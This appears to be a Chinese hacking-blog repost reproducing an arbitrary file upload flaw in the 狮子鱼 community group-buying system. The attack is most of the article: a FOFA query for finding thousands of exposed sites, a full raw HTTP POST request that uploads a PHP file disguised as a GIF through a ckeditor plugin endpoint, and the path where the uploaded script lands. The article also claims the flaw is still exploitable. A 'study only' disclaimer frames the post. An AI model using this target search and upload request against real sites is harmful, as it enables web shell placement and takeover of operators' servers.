记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

狮子鱼前台任意文件上传复现及工具分享

2023-03-19 10:22
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。仅供学习研究


文章来源:漏洞复现


狮子鱼前台任意文件上传复现

网站系统为狮子鱼社区团购系统,网上用的也比较多,我fofa上搜了一下,大概有6-7千多。主要用户各种购物,本文主要介绍其中的文件上传漏洞,漏洞复现以及漏洞工具分享。

FoFa语句

"/seller.php?s=/Public/login"

Payload

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1
Host: ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Connection: close
Content-Length: 206

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="shenye.php"
Content-Type: image/gif

<?php echo('shenye');?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—

「接着在当前路径可以发现上传成功」

/Common/image/uploads/163*****365.php


发现目前依旧存在此漏洞,「仅限学习研究」






知识来源: mp.weixin.qq.com%2Fs%2F5R2VdFmNhd1ihy1CihRmuw&id=00c4715b4917faba6bedbb605f7d01db

阅读:87873 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“狮子鱼前台任意文件上传复现及工具分享”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

❤用费0款退球星,年1期效有员会

标签云 ☁